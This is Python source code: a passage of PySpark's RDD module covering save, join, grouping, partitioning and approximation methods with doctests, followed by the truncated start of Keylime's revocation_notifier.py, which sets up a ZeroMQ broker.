Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).collect())
[1, 2, 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> ''.join(sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed)))
'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, basestring):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda (k, v): k)
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda (k, v): v)
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.iteritems():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> set(sets[0]).intersection(set(sets[1]))
set([])
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in buckets.keys():
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = (size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(batch / 1.5, 1)
c = 0
for split, items in buckets.iteritems():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower()
== 'true')
memory = _parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m"))
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.iteritems()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeCombiners(iterator)
return merger.iteritems()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> rdd.foldByKey(0, add).collect()
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with into numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> map((lambda (x,y): (x, list(y))), sorted(x.groupByKey().collect()))
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
numPartitions).mapValues(lambda x: ResultIterable(x))
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda (k, v): (k, f(v))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1]), list(y[2]), list(y[3])))), \
sorted(list(w.groupWith(x, y, z).collect())))
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1])))), sorted(list(x.cogroup(y).collect())))
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func((key, vals)):
return vals[0] and not vals[1]
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> map((lambda (x,y): (x, (list(y[0]), (list(y[1]))))), sorted(x.cogroup(y).collect()))
[(0, ([0], [0])), (1, ([1], [1])), (2, ([], [2])), (3, ([], [3])), (4, ([2], [4]))]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
name_ = self._jrdd.name()
if name_:
return name_.encode('utf-8')
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.setName('RDD1').name()
'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
"""
values = self.filter(lambda (k, v): k == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)], False)
return values.collect()
def _to_java_object_rdd(self):
""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(xrange(1000))
>>> (rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(xrange(1000)) / 1000.0
>>> (rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 950 < n < 1050
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 18 < n < 22
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
if relativeSD > 0.37:
raise ValueError("relativeSD should be smaller than 0.37")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
partitions = xrange(self.getNumPartitions())
for partition in partitions:
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# tracking the life cycle by obj
if obj is not None:
obj._broadcast = broadcast
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
self._broadcast = None
def __del__(self):
if self._broadcast:
self._broadcast.unpersist()
self._broadcast = None
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
revocation_notifier.py
|
"""
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
"""
import functools
import os
import signal
import sys
import threading
import time
from multiprocessing import Process
from typing import Optional
import requests
from keylime import config, crypto, json, keylime_logging, secure_mount
from keylime.common import retry
logger = keylime_logging.init_logging("revocation_notifier")
broker_proc: Optional[Process] = None
_SOCKET_PATH = "/var/run/keylime/keylime.verifier.ipc"
def start_broker():
assert config.getboolean("cloud_verifier", "revocation_notifier")
try:
import zmq # pylint: disable=import-outside-toplevel
except ImportError as error:
raise Exception("install PyZMQ for 'revocation_notifier' option") from error
def worker():
# do not receive signals form the parent process
os.setpgrp()
signal.signal(signal.SIGTERM, lambda *_: sys.exit(0))
dir_name = os.path.dirname(_SOCKET_PATH)
if not os.path.exists(dir_name):
os.makedirs(dir_name, 0o700)
else:
if os.stat(dir_name).st_mode & 0o777 != 0o700:
msg = f"{dir_name} present with wrong permissions"
logger.error(msg)
raise Exception(msg)
context = zmq.Context(1)
frontend = context.socket(zmq.SUB)
frontend.bind(f"ipc://{_SOCKET_PATH}")
frontend.setsockopt(zmq.SUBSCRIBE, b"")
# Socket facing services
backend = context.socket(zmq.PUB)
backend.bind(
f"tcp://{config.get('cloud_verifier', 'revocation_notifier_ip')}:"
f"{config.getint('cloud_verifier', 'revocation_notifier_port')}"
)
try:
zmq.device(zmq.FORWARDER, frontend, backend)
except (KeyboardInterrupt, SystemExit):
context.destroy()
global broker_proc
